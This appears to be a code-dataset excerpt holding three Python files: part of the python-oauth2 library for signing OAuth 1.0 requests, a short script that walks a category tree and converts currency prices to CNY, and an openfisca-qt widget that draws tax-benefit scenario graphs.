return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def build_xoauth_string(url, consumer, token=None):
"""Build an XOAUTH string for use in SMTP/IMPA authentication."""
request = Request.from_consumer_and_token(consumer, token,
"GET", url)
signing_method = SignatureMethod_HMAC_SHA1()
request.sign_request(signing_method, consumer, token)
params = []
for k, v in sorted(request.iteritems()):
if v is not None:
params.append('%s="%s"' % (k, escape(v)))
return "%s %s %s" % ("GET", url, ','.join(params))
def to_unicode(s):
""" Convert to unicode, raise exception with instructive error
message if s is not unicode, ascii, or utf-8. """
if not isinstance(s, unicode):
if not isinstance(s, str):
raise TypeError('You are required to pass either unicode or string here, not: %r (%s)' % (type(s), s))
try:
s = s.decode('utf-8')
except UnicodeDecodeError, le:
raise TypeError('You are required to pass either a unicode object or a utf-8 string here. You passed a Python string object which contained non-utf-8: %r. The UnicodeDecodeError that resulted from attempting to interpret it as utf-8 was: %s' % (s, le,))
return s
def to_utf8(s):
return to_unicode(s).encode('utf-8')
def to_unicode_if_string(s):
if isinstance(s, basestring):
return to_unicode(s)
else:
return s
def to_utf8_if_string(s):
if isinstance(s, basestring):
return to_utf8(s)
else:
return s
def to_unicode_optional_iterator(x):
"""
Raise TypeError if x is a str containing non-utf8 bytes or if x is
an iterable which contains such a str.
"""
if isinstance(x, basestring):
return to_unicode(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_unicode(e) for e in l ]
def to_utf8_optional_iterator(x):
"""
Raise TypeError if x is a str or if x is an iterable which
contains a str.
"""
if isinstance(x, basestring):
return to_utf8(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_utf8_if_string(e) for e in l ]
def escape(s):
"""Escape a URL including any /."""
return urllib.quote(s.encode('utf-8'), safe='~')
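# e.g. escape(u'a b/~c') returns 'a%20b%2F~c'; alphanumerics plus
# '-', '_', '.' and '~' pass through unescaped, matching OAuth's
# percent-encoding rules.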
def generate_timestamp():
"""Get seconds since epoch (UTC)."""
return int(time.time())
def generate_nonce(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def generate_verifier(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
class Consumer(object):
"""A consumer of OAuth-protected services.
The OAuth consumer is a "third-party" service that wants to access
protected resources from an OAuth service provider on behalf of an end
user. It's kind of the OAuth client.
Usually a consumer must be registered with the service provider by the
developer of the consumer software. As part of that process, the service
provider gives the consumer a *key* and a *secret* with which the consumer
software can identify itself to the service. The consumer will include its
key in each request to identify itself, but will use its secret only when
signing requests, to prove that the request is from that particular
registered consumer.
Once registered, the consumer can then use its consumer credentials to ask
the service provider for a request token, kicking off the OAuth
authorization process.
"""
key = None
secret = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def __str__(self):
data = {'oauth_consumer_key': self.key,
'oauth_consumer_secret': self.secret}
return urllib.urlencode(data)
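# Typical usage sketch (illustrative, with made-up credentials): pair a
# Consumer with an optional Token and sign a Request, e.g.
#
#   consumer = Consumer(key='my-key', secret='my-secret')
#   req = Request.from_consumer_and_token(consumer, None, 'GET', url)
#   req.sign_request(SignatureMethod_HMAC_SHA1(), consumer, None)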
class Token(object):
"""An OAuth credential used to request authorization or a protected
resource.
Tokens in OAuth comprise a *key* and a *secret*. The key is included in
requests to identify the token being used, but the secret is used only in
the signature, to prove that the requester is who the server gave the
token to.
When first negotiating the authorization, the consumer asks for a *request
token* that the live user authorizes with the service provider. The
consumer then exchanges the request token for an *access token* that can
be used to access protected resources.
"""
key = None
secret = None
callback = None
callback_confirmed = None
verifier = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def set_callback(self, callback):
self.callback = callback
self.callback_confirmed = 'true'
def set_verifier(self, verifier=None):
if verifier is not None:
self.verifier = verifier
else:
self.verifier = generate_verifier()
def get_callback_url(self):
if self.callback and self.verifier:
# Append the oauth_verifier.
parts = urlparse.urlparse(self.callback)
scheme, netloc, path, params, query, fragment = parts[:6]
if query:
query = '%s&oauth_verifier=%s' % (query, self.verifier)
else:
query = 'oauth_verifier=%s' % self.verifier
return urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
return self.callback
def to_string(self):
"""Returns this token as a plain string, suitable for storage.
The resulting string includes the token's secret, so you should never
send or store this string where a third party can read it.
"""
data = {
'oauth_token': self.key,
'oauth_token_secret': self.secret,
}
if self.callback_confirmed is not None:
data['oauth_callback_confirmed'] = self.callback_confirmed
return urllib.urlencode(data)
@staticmethod
def from_string(s):
"""Deserializes a token from a string like one returned by
`to_string()`."""
if not len(s):
raise ValueError("Invalid parameter string.")
params = parse_qs(s, keep_blank_values=False)
if not len(params):
raise ValueError("Invalid parameter string.")
try:
key = params['oauth_token'][0]
except Exception:
raise ValueError("'oauth_token' not found in OAuth request.")
try:
secret = params['oauth_token_secret'][0]
except Exception:
raise ValueError("'oauth_token_secret' not found in "
"OAuth request.")
token = Token(key, secret)
try:
token.callback_confirmed = params['oauth_callback_confirmed'][0]
except KeyError:
pass # 1.0, no callback confirmed.
return token
def __str__(self):
return self.to_string()
def setter(attr):
name = attr.__name__
def getter(self):
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name)
def deleter(self):
del self.__dict__[name]
return property(getter, attr, deleter)
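# `setter` builds a property whose setter is the decorated method and
# whose getter/deleter go through the instance __dict__; Request uses it
# below for its `url` and `method` attributes.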
class Request(dict):
"""The parameters and information for an HTTP request, suitable for
authorizing with OAuth credentials.
When a consumer wants to access a service's protected resources, it does
so using a signed HTTP request identifying itself (the consumer) with its
key, and providing an access token authorized by the end user to access
those resources.
"""
version = OAUTH_VERSION
def __init__(self, method=HTTP_METHOD, url=None, parameters=None,
body='', is_form_encoded=False):
if url is not None:
self.url = to_unicode(url)
self.method = method
if parameters is not None:
for k, v in parameters.iteritems():
k = to_unicode(k)
v = to_unicode_optional_iterator(v)
self[k] = v
self.body = body
self.is_form_encoded = is_form_encoded
@setter
def url(self, value):
self.__dict__['url'] = value
if value is not None:
scheme, netloc, path, params, query, fragment = urlparse.urlparse(value)
# Exclude default port numbers.
if scheme == 'http' and netloc[-3:] == ':80':
netloc = netloc[:-3]
elif scheme == 'https' and netloc[-4:] == ':443':
netloc = netloc[:-4]
if scheme not in ('http', 'https'):
raise ValueError("Unsupported URL %s (%s)." % (value, scheme))
# Normalized URL excludes params, query, and fragment.
self.normalized_url = urlparse.urlunparse((scheme, netloc, path, None, None, None))
else:
self.normalized_url = None
self.__dict__['url'] = None
@setter
def method(self, value):
self.__dict__['method'] = value.upper()
def _get_timestamp_nonce(self):
return self['oauth_timestamp'], self['oauth_nonce']
def get_nonoauth_parameters(self):
"""Get any non-OAuth parameters."""
return dict([(k, v) for k, v in self.iteritems()
if not k.startswith('oauth_')])
def to_header(self, realm=''):
"""Serialize as a header for an HTTPAuth request."""
oauth_params = ((k, v) for k, v in self.items()
if k.startswith('oauth_'))
stringy_params = ((k, escape(str(v))) for k, v in oauth_params)
header_params = ('%s="%s"' % (k, v) for k, v in stringy_params)
params_header = ', '.join(header_params)
auth_header = 'OAuth realm="%s"' % realm
if params_header:
auth_header = "%s, %s" % (auth_header, params_header)
return {'Authorization': auth_header}
def to_postdata(self):
"""Serialize as post data for a POST request."""
d = {}
for k, v in self.iteritems():
d[k.encode('utf-8')] = to_utf8_optional_iterator(v)
# tell urlencode to deal with sequence values and map them correctly
# to resulting querystring. for example self["k"] = ["v1", "v2"] will
# result in 'k=v1&k=v2' and not k=%5B%27v1%27%2C+%27v2%27%5D
return urllib.urlencode(d, True).replace('+', '%20')
def to_url(self):
"""Serialize as a URL for a GET request."""
base_url = urlparse.urlparse(self.url)
try:
query = base_url.query
except AttributeError:
# must be python <2.5
query = base_url[4]
query = parse_qs(query)
if 'oauth_signature' in query:
del(query['oauth_signature'])
for k, v in self.items():
            if k not in query:
query.setdefault(k, []).append(v)
try:
scheme = base_url.scheme
netloc = base_url.netloc
path = base_url.path
params = base_url.params
fragment = base_url.fragment
except AttributeError:
# must be python <2.5
scheme = base_url[0]
netloc = base_url[1]
path = base_url[2]
params = base_url[3]
fragment = base_url[5]
url = (scheme, netloc, path, params,
urllib.urlencode(query, True), fragment)
return urlparse.urlunparse(url)
def get_parameter(self, parameter):
ret = self.get(parameter)
if ret is None:
raise Error('Parameter not found: %s' % parameter)
return ret
def get_normalized_parameters(self):
"""Return a string that contains the parameters that must be signed."""
items = []
query = urlparse.urlparse(self.url)[4]
url_items = self._split_url_string(query).items()
for key, value in self.iteritems():
if key == 'oauth_signature' or key in query:
continue
# 1.0a/9.1.1 states that kvp must be sorted by key, then by value,
# so we unpack sequence values into multiple items for sorting.
if isinstance(value, basestring):
items.append((to_utf8_if_string(key), to_utf8(value)))
else:
try:
value = list(value)
except TypeError, e:
assert 'is not iterable' in str(e)
items.append((to_utf8_if_string(key), to_utf8_if_string(value)))
else:
items.extend((to_utf8_if_string(key), to_utf8_if_string(item)) for item in value)
# Include any query string parameters from the provided URL
url_items = [(to_utf8(k), to_utf8(v)) for k, v in url_items if k != 'oauth_signature' ]
items.extend(url_items)
items.sort()
encoded_str = urllib.urlencode(items)
        # Encode signature parameters per OAuth Core 1.0 protocol
# spec draft 7, section 3.6
# (http://tools.ietf.org/html/draft-hammer-oauth-07#section-3.6)
# Spaces must be encoded with "%20" instead of "+"
return encoded_str.replace('+', '%20').replace('%7E', '~')
def sign_request(self, signature_method, consumer, token):
"""Set the signature parameter to the result of sign."""
if not self.is_form_encoded:
# according to
# http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html
# section 4.1.1 "OAuth Consumers MUST NOT include an
# oauth_body_hash parameter on requests with form-encoded
# request bodies."
self['oauth_body_hash'] = base64.b64encode(sha(self.body).digest())
if 'oauth_consumer_key' not in self:
self['oauth_consumer_key'] = consumer.key
if token and 'oauth_token' not in self:
self['oauth_token'] = token.key
self['oauth_signature_method'] = signature_method.name
self['oauth_signature'] = signature_method.sign(self, consumer, token)
@classmethod
def make_timestamp(cls):
"""Get seconds since epoch (UTC)."""
return str(int(time.time()))
@classmethod
def make_nonce(cls):
"""Generate pseudorandom number."""
return str(random.randint(0, 100000000))
@classmethod
def from_request(cls, http_method, http_url, headers=None, parameters=None,
query_string=None):
"""Combines multiple parameter sources."""
if parameters is None:
parameters = {}
# Headers
if headers and 'Authorization' in headers:
auth_header = headers['Authorization']
# Check that the authorization header is OAuth.
if auth_header[:6] == 'OAuth ':
auth_header = auth_header[6:]
try:
# Get the parameters from the header.
header_params = cls._split_header(auth_header)
parameters.update(header_params)
except:
raise Error('Unable to parse OAuth parameters from '
'Authorization header.')
# GET or POST query string.
if query_string:
query_params = cls._split_url_string(query_string)
parameters.update(query_params)
# URL parameters.
param_str = urlparse.urlparse(http_url)[4] # query
url_params = cls._split_url_string(param_str)
parameters.update(url_params)
if parameters:
return cls(http_method, http_url, parameters)
return None
@classmethod
def from_consumer_and_token(cls, consumer, token=None,
http_method=HTTP_METHOD, http_url=None, parameters=None,
body='', is_form_encoded=False):
if not parameters:
parameters = {}
defaults = {
'oauth_consumer_key': consumer.key,
'oauth_timestamp': cls.make_timestamp(),
'oauth_nonce': cls.make_nonce(),
'oauth_version': cls.version,
}
defaults.update(parameters)
parameters = defaults
if token:
parameters['oauth_token'] = token.key
if token.verifier:
parameters['oauth_verifier'] = token.verifier
return Request(http_method, http_url, parameters, body=body,
is_form_encoded=is_form_encoded)
@classmethod
def from_token_and_callback(cls, token, callback=None,
http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
parameters['oauth_token'] = token.key
if callback:
parameters['oauth_callback'] = callback
return cls(http_method, http_url, parameters)
@staticmethod
def _split_header(header):
"""Turn Authorization: header into parameters."""
params = {}
parts = header.split(',')
for param in parts:
# Ignore realm parameter.
if param.find('realm') > -1:
continue
# Remove whitespace.
param = param.strip()
# Split key-value.
param_parts = param.split('=', 1)
# Remove quotes and unescape the value.
params[param_parts[0]] = urllib.unquote(param_parts[1].strip('\"'))
return params
@staticmethod
def _split_url_string(param_str):
"""Turn URL string into parameters."""
parameters = parse_qs(param_str.encode('utf-8'), keep_blank_values=True)
for k, v in parameters.iteritems():
parameters[k] = urllib.unquote(v[0])
return parameters
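# Sketch of building and signing a request by hand (consumer key/secret and
# URL are placeholders):
#
#   consumer = Consumer('consumer-key', 'consumer-secret')
#   req = Request.from_consumer_and_token(consumer, http_method='GET',
#                                         http_url='http://example.com/resource')
#   req.sign_request(SignatureMethod_HMAC_SHA1(), consumer, None)
#   headers = req.to_header(realm='http://example.com/')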
class Client(httplib2.Http):
"""OAuthClient is a worker to attempt to execute a request."""
def __init__(self, consumer, token=None, cache=None, timeout=None,
proxy_info=None):
if consumer is not None and not isinstance(consumer, Consumer):
raise ValueError("Invalid consumer.")
if token is not None and not isinstance(token, Token):
raise ValueError("Invalid token.")
self.consumer = consumer
self.token = token
self.method = SignatureMethod_HMAC_SHA1()
httplib2.Http.__init__(self, cache=cache, timeout=timeout, proxy_info=proxy_info)
def set_signature_method(self, method):
if not isinstance(method, SignatureMethod):
raise ValueError("Invalid signature method.")
self.method = method
def request(self, uri, method="GET", body='', headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS, connection_type=None):
DEFAULT_POST_CONTENT_TYPE = 'application/x-www-form-urlencoded'
if not isinstance(headers, dict):
headers = {}
if method == "POST":
headers['Content-Type'] = headers.get('Content-Type',
DEFAULT_POST_CONTENT_TYPE)
is_form_encoded = \
headers.get('Content-Type') == 'application/x-www-form-urlencoded'
if is_form_encoded and body:
parameters = parse_qs(body)
else:
parameters = None
req = Request.from_consumer_and_token(self.consumer,
token=self.token, http_method=method, http_url=uri,
parameters=parameters, body=body, is_form_encoded=is_form_encoded)
req.sign_request(self.method, self.consumer, self.token)
schema, rest = urllib.splittype(uri)
if rest.startswith('//'):
hierpart = '//'
else:
hierpart = ''
host, rest = urllib.splithost(rest)
realm = schema + ':' + hierpart + host
if is_form_encoded:
body = req.to_postdata()
elif method == "GET":
uri = req.to_url()
else:
headers.update(req.to_header(realm=realm))
return httplib2.Http.request(self, uri, method=method, body=body,
headers=headers, redirections=redirections,
connection_type=connection_type)
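# Minimal two-legged usage of Client (URL and credentials are placeholders):
#
#   client = Client(Consumer('key', 'secret'))
#   resp, content = client.request('http://example.com/api', 'GET')
#
# Requests are signed with HMAC-SHA1 unless set_signature_method() swaps in
# another SignatureMethod.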
class Server(object):
"""A skeletal implementation of a service provider, providing protected
resources to requests from authorized consumers.
This class implements the logic to check requests for authorization. You
can use it with your web server or web framework to protect certain
resources with OAuth.
"""
timestamp_threshold = 300 # In seconds, five minutes.
version = OAUTH_VERSION
signature_methods = None
def __init__(self, signature_methods=None):
self.signature_methods = signature_methods or {}
def add_signature_method(self, signature_method):
self.signature_methods[signature_method.name] = signature_method
return self.signature_methods
def verify_request(self, request, consumer, token):
"""Verifies an api call and checks all the parameters."""
self._check_version(request)
self._check_signature(request, consumer, token)
parameters = request.get_nonoauth_parameters()
return parameters
def build_authenticate_header(self, realm=''):
"""Optional support for the authenticate header."""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def _check_version(self, request):
"""Verify the correct version of the request for this server."""
version = self._get_version(request)
if version and version != self.version:
raise Error('OAuth version %s not supported.' % str(version))
def _get_version(self, request):
"""Return the version of the request for this server."""
try:
version = request.get_parameter('oauth_version')
except:
version = OAUTH_VERSION
return version
def _get_signature_method(self, request):
"""Figure out the signature with some defaults."""
try:
signature_method = request.get_parameter('oauth_signature_method')
except:
signature_method = SIGNATURE_METHOD
try:
# Get the signature method object.
signature_method = self.signature_methods[signature_method]
except:
signature_method_names = ', '.join(self.signature_methods.keys())
            raise Error('Signature method %s not supported; try one of the following: %s' % (signature_method, signature_method_names))
return signature_method
def _get_verifier(self, request):
return request.get_parameter('oauth_verifier')
def _check_signature(self, request, consumer, token):
timestamp, nonce = request._get_timestamp_nonce()
self._check_timestamp(timestamp)
signature_method = self._get_signature_method(request)
try:
signature = request.get_parameter('oauth_signature')
except:
raise MissingSignature('Missing oauth_signature.')
# Validate the signature.
valid = signature_method.check(request, consumer, token, signature)
if not valid:
key, base = signature_method.signing_base(request, consumer, token)
raise Error('Invalid signature. Expected signature base '
'string: %s' % base)
def _check_timestamp(self, timestamp):
"""Verify that timestamp is recentish."""
timestamp = int(timestamp)
now = int(time.time())
lapsed = now - timestamp
if lapsed > self.timestamp_threshold:
raise Error('Expired timestamp: given %d and now %s has a '
'greater difference than threshold %d' % (timestamp, now,
self.timestamp_threshold))
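# Sketch of server-side verification (all names are placeholders; consumer
# and token come from the provider's own storage):
#
#   server = Server()
#   server.add_signature_method(SignatureMethod_HMAC_SHA1())
#   req = Request.from_request('GET', uri, headers=headers,
#                              query_string=query_string)
#   params = server.verify_request(req, consumer, token)  # raises Error on failure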
class SignatureMethod(object):
"""A way of signing requests.
The OAuth protocol lets consumers and service providers pick a way to sign
requests. This interface shows the methods expected by the other `oauth`
modules for signing requests. Subclass it and implement its methods to
provide a new way to sign requests.
"""
def signing_base(self, request, consumer, token):
"""Calculates the string that needs to be signed.
This method returns a 2-tuple containing the starting key for the
signing and the message to be signed. The latter may be used in error
messages to help clients debug their software.
"""
raise NotImplementedError
def sign(self, request, consumer, token):
"""Returns the signature for the given request, based on the consumer
and token also provided.
You should use your implementation of `signing_base()` to build the
message to sign. Otherwise it may be less useful for debugging.
"""
raise NotImplementedError
def check(self, request, consumer, token, signature):
"""Returns whether the given signature is the correct signature for
the given consumer and token signing the given request."""
built = self.sign(request, consumer, token)
return built == signature
class SignatureMethod_HMAC_SHA1(SignatureMethod):
name = 'HMAC-SHA1'
def signing_base(self, request, consumer, token):
if not hasattr(request, 'normalized_url') or request.normalized_url is None:
raise ValueError("Base URL for request is not set.")
sig = (
escape(request.method),
escape(request.normalized_url),
escape(request.get_normalized_parameters()),
)
key = '%s&' % escape(consumer.secret)
if token:
key += escape(token.secret)
raw = '&'.join(sig)
return key, raw
    def sign(self, request, consumer, token):
        """Signs the request with HMAC-SHA1 and returns the base64 digest."""
key, raw = self.signing_base(request, consumer, token)
hashed = hmac.new(key, raw, sha)
# Calculate the digest base 64.
return binascii.b2a_base64(hashed.digest())[:-1]
class SignatureMethod_PLAINTEXT(SignatureMethod):
name = 'PLAINTEXT'
def signing_base(self, request, consumer, token):
"""Concatenates the consumer key and secret with the token's
secret."""
sig = '%s&' % escape(consumer.secret)
if token:
sig = sig + escape(token.secret)
return sig, sig
def sign(self, request, consumer, token):
key, raw = self.signing_base(request, consumer, token)
return raw
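# Worked example of the two signing bases (illustrative). For a GET of
# http://example.com/res the HMAC-SHA1 base string is
#
#   GET&http%3A%2F%2Fexample.com%2Fres&<escaped, sorted oauth_*/query params>
#
# i.e. method, normalized URL and normalized parameters, each escaped and
# joined by '&'. The HMAC key is 'consumer-secret&token-secret', or just
# 'consumer-secret&' when no token is involved; PLAINTEXT uses that same
# key string directly as the signature.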
|
mit
| -5,403,328,534,905,743,000
| 32.807648
| 265
| 0.609199
| false
| 4.254302
| false
| false
| false
|
uxlsl/uxlsl.github.io
|
demo/code/test/xiyanghui.py
|
1
|
1481
|
import requests
infos = requests.get('https://job.xiyanghui.com/api/q1/json').json()
def build(n, parent, dic):
dic[n["id"]] = {"name": n["name"], "parent": parent}
for i in n.get("children", []):
build(i, n["id"], dic)
def builds(infos, dic):
for i in infos:
build(i, -1, dic)
def check(dic, id):
if id not in dic:
        return 'not found'
lst = []
while id != -1:
lst.append(dic[id]['name'])
id = dic[id]["parent"]
return '>'.join(lst[::-1])
dic = {}
builds(infos, dic)
print(check(dic, 1120))
print(check(dic, 2221))
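# check() walks the parent links up to the sentinel root (-1) and joins the
# names top-down, so an id three levels deep prints something like
# 'grandparent>parent>child' (the actual names come from the API payload).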
##############################
# Implement an SDK class on top of the exchange-rate API: given a currency
# and a price, return the corresponding real-time price in CNY.
rates = requests.get('https://app-cdn.2q10.com/api/v2/currency').json()
class RateConverter:
@staticmethod
def convertToCNY(s):
small = {j:i for i,j in [('USD', '$'),('GBP', '£'),('EUR', '€'),('HKD','HK$'),('JPY', '¥')]}
coin = ''
num = 0
for index, c in enumerate(s):
if c.isdigit():
coin = s[:index]
num = float(s[index:].replace(',', ''))
if coin in small:
coin = small[coin]
return num / rates['rates'][coin] * rates['rates']['CNY']
return -1
for i in ['$1,999.00', 'HKD2399', 'EUR499.99', '€499.99']:
    print('input {}, output {}'.format(i, RateConverter.convertToCNY(i)))
|
mit
| 2,871,237,075,796,517,400
| 23.75
| 100
| 0.501805
| false
| 2.77
| false
| false
| false
|
openfisca/openfisca-qt
|
openfisca_qt/plugins/scenario/graph.py
|
1
|
26654
|
# -*- coding:utf-8 -*-
# Copyright © 2011 Clément Schaff, Mahdi Ben Jelloul
"""
openFisca, Logiciel libre de simulation du système socio-fiscal français
Copyright © 2011 Clément Schaff, Mahdi Ben Jelloul
This file is part of openFisca.
openFisca is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
openFisca is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with openFisca. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import division
import locale
import os
from matplotlib.lines import Line2D
from matplotlib.patches import Rectangle, FancyArrow
from matplotlib.ticker import FuncFormatter
import numpy as np
from openfisca_core import model  # used below by populate_absBox, drawTaux and RevTot
from ...gui.baseconfig import get_translation
from ...gui.config import get_icon
from ...gui.qt.compat import (to_qvariant, getsavefilename)
from ...gui.qt.QtCore import (
QAbstractItemModel, QModelIndex, Qt, SIGNAL, QSize, QString,
)
from ...gui.qt.QtGui import (
QColor, QVBoxLayout, QDialog, QMessageBox, QTreeView, QIcon, QPixmap, QHBoxLayout, QPushButton,
)
from ...gui.utils.qthelpers import create_action
from ...gui.views.ui_graph import Ui_Graph
from .. import OpenfiscaPluginWidget
from ..utils import OutNode
_ = get_translation('openfisca_qt')
locale.setlocale(locale.LC_ALL, '')
class GraphFormater(QDialog):
def __init__(self, data, mode, parent = None):
super(GraphFormater, self).__init__(parent)
self.setObjectName(u'Affichage')
self.setWindowTitle(u'Options du graphique')
self.data = data
self.parent = parent
view = QTreeView(self)
view.setIndentation(10)
self.model = DataModel(data, mode, self)
view.setModel(self.model)
VLayout = QVBoxLayout()
HLayout = QHBoxLayout()
allBtn = QPushButton(u'Tout cocher')
noneBtn = QPushButton(u'Tout décocher')
HLayout.addWidget(allBtn)
HLayout.addWidget(noneBtn)
self.setLayout(VLayout)
VLayout.addLayout(HLayout)
VLayout.addWidget(view)
self.connect(self.model, SIGNAL('dataChanged(QModelIndex, QModelIndex)'), self.updateGraph)
self.connect(allBtn, SIGNAL('clicked()'), self.checkAll)
self.connect(noneBtn, SIGNAL('clicked()'), self.checkNone)
def checkAll(self):
self.data.setLeavesVisible()
self.updateGraph()
self.model.reset()
def checkNone(self):
self.data.hideAll()
self.updateGraph()
self.model.reset()
def updateGraph(self):
self.parent.updateGraph2()
def colorIcon(color):
r, g, b = color
qcolor = QColor(r, g, b)
size = QSize(22,22)
pixmap = QPixmap(size)
pixmap.fill(qcolor)
return QIcon(pixmap)
class DataModel(QAbstractItemModel):
def __init__(self, root, mode, parent=None):
super(DataModel, self).__init__(parent)
self._rootNode = root
self.mode = mode
def rowCount(self, parent):
if not parent.isValid():
parentNode = self._rootNode
else:
parentNode = self.getNode(parent)
return parentNode.childCount()
def columnCount(self, parent):
return 1
def data(self, index, role = Qt.DisplayRole):
if not index.isValid():
return None
node = self.getNode(index)
if role == Qt.DisplayRole or role == Qt.EditRole:
return to_qvariant(node.desc)
if role == Qt.DecorationRole:
return colorIcon(node.color)
if role == Qt.CheckStateRole:
return to_qvariant(2*(node.visible>=1))
def setData(self, index, value, role = Qt.EditRole):
if not index.isValid():
return None
node = self.getNode(index)
if role == Qt.CheckStateRole:
if not(node.parent == self._rootNode):
first_index = self.createIndex(node.parent.row(), 0, node.parent)
else:
first_sibling = node.parent.children[0]
first_index = self.createIndex(first_sibling.row(), 0, first_sibling)
last_sibling = node.parent.children[-1]
last_index = self.createIndex(last_sibling.row(), 0, last_sibling)
if self.mode == 'bareme':
if node.visible>=1: node.visible = 0
else: node.visible = 1
else:
if node.visible>=1: node.setHidden()
else: node.setVisible()
self.dataChanged.emit(first_index, last_index)
return True
return False
def headerData(self, section, orientation, role):
if role == Qt.DisplayRole:
if section == 0: return u"Variable"
def flags(self, index):
node = self.getNode(index)
if np.any(node.vals != 0):
return Qt.ItemIsEnabled | Qt.ItemIsSelectable | Qt.ItemIsUserCheckable
else:
return Qt.ItemIsSelectable
"""Should return the parent of the node with the given QModelIndex"""
def parent(self, index):
node = self.getNode(index)
parentNode = node.parent
if parentNode == self._rootNode:
return QModelIndex()
return self.createIndex(parentNode.row(), 0, parentNode)
"""Should return a QModelIndex that corresponds to the given row, column and parent node"""
def index(self, row, column, parent):
parentNode = self.getNode(parent)
childItem = parentNode.child(row)
if childItem:
return self.createIndex(row, column, childItem)
else:
return QModelIndex()
def getNode(self, index):
if index.isValid():
node = index.internalPointer()
if node:
return node
return self._rootNode
class ScenarioGraphWidget(OpenfiscaPluginWidget, Ui_Graph):
"""
Scenario Graph Widget
"""
CONF_SECTION = 'composition'
def __init__(self, parent = None):
super(ScenarioGraphWidget, self).__init__(parent)
self.setupUi(self)
self._parent = parent
self.mplwidget.mpl_connect('pick_event', self.on_pick)
self.mplwidget.mpl_connect('motion_notify_event', self.pick)
self.connect(self.option_btn, SIGNAL('clicked()'), self.set_option)
self.connect(self.taux_btn, SIGNAL('stateChanged(int)'), self.set_taux)
self.connect(self.hidelegend_btn, SIGNAL('toggled(bool)'), self.hide_legend)
self.taux = False
self.legend = True
self.simulation = None
self.setLayout(self.verticalLayout)
self.initialize_plugin()
#------ Public API ---------------------------------------------
def set_taux(self, value):
"""
Switch on/off the tax rates view
Parameters
----------
value : bool
If True, switch to tax rates view
"""
if value: self.taux = True
else: self.taux = False
self.updateGraph2()
def hide_legend(self, value):
if value: self.legend = False
else: self.legend = True
self.updateGraph2()
def set_option(self):
'''
Sets graph options
'''
try:
mode = self.simulation.mode
except:
mode = 'bareme'
gf = GraphFormater(self.data, mode, self)
gf.exec_()
def pick(self, event):
        if event.xdata is not None and event.ydata is not None:
self.mplwidget.figure.pick(event)
else:
self.setToolTip("")
def on_pick(self, event):
label = event.artist._label
self.setToolTip(label)
def updateGraph(self, scenario):
"""
Update the graph according to simulation
"""
self.scenario = scenario
print scenario
        # TODO: link the decomposition with parameters
data = OutNode.create_from_scenario_decomposition_json(
scenario = scenario,
simulation = None,
decomposiiton_json = None
)
dataDefault = data # TODO: data_default
reforme = scenario.reforme = False # TODO: fix this
        mode = scenario.mode = "castype" # TODO: "castype" or "bareme"
x_axis = scenario.x_axis = "sal" # TODO change this too
self.data = data
self.dataDefault = dataDefault
self.data.setLeavesVisible()
data['revdisp'].visible = 1
if mode == 'bareme': # TODO: make this country-totals specific
for rev in ['salsuperbrut', 'salbrut', 'chobrut', 'rstbrut']:
try:
data[rev].setHidden()
except:
pass
if reforme:
data.hideAll()
self.populate_absBox(x_axis, mode)
for axe in self.main.composition.XAXIS_PROPERTIES.itervalues():
if axe['name'] == x_axis:
self.graph_x_axis = axe['typ_tot_default']
break
self.updateGraph2()
def updateGraph2(self):
ax = self.mplwidget.axes
ax.clear()
currency = self.main.tax_benefit_system.CURRENCY
mode = self.scenario.mode
reforme = self.scenario.reforme
if mode == 'castype':
drawWaterfall(self.data, ax)
else:
if self.taux:
drawTaux(self.data, ax, self.graph_x_axis, reforme, self.dataDefault)
else:
drawBareme(self.data, ax, self.graph_x_axis, reforme, self.dataDefault, self.legend, currency = currency)
self.mplwidget.draw()
def populate_absBox(self, x_axis, mode):
self.disconnect(self.absBox, SIGNAL('currentIndexChanged(int)'), self.x_axis_changed)
self.absBox.clear()
if mode == 'castype':
self.absBox.setEnabled(False)
self.taux_btn.setEnabled(False)
self.hidelegend_btn.setEnabled(False)
return
self.taux_btn.setEnabled(True)
self.absBox.setEnabled(True)
self.hidelegend_btn.setEnabled(True)
for axe in model.x_axes.itervalues():
if axe.name == x_axis:
typ_revs_labels = axe.typ_tot.values()
typ_revs = axe.typ_tot.keys()
self.absBox.addItems(typ_revs_labels) # TODO: get label from description
self.absBox.setCurrentIndex(typ_revs.index(axe.typ_tot_default))
self.connect(self.absBox, SIGNAL('currentIndexChanged(int)'), self.x_axis_changed)
return
def x_axis_changed(self):
mode = self.simulation.mode
if mode == "bareme":
text = self.absBox.currentText()
for axe in self.main.composition.XAXIS_PROPERTIES.itervalues():
for key, label in axe.typ_tot.iteritems():
if text == label:
self.graph_x_axis = key
self.updateGraph2()
return
def save_figure(self, *args):
filetypes = self.mplwidget.get_supported_filetypes_grouped()
sorted_filetypes = filetypes.items()
sorted_filetypes.sort()
default_filetype = self.mplwidget.get_default_filetype()
output_dir = self.get_option('graph/export_dir')
start = os.path.join(output_dir, 'image.') + default_filetype
filters = []
selectedFilter = None
for name, exts in sorted_filetypes:
exts_list = " ".join(['*.%s' % ext for ext in exts])
filtre = '%s (%s)' % (name, exts_list)
if default_filetype in exts:
selectedFilter = filtre
filters.append(filtre)
filters = ';;'.join(filters)
fname, format = getsavefilename(
self, _("Save image"), start, filters, selectedFilter) # "Enregistrer l'image"
if fname:
output_dir = os.path.dirname(str(fname))
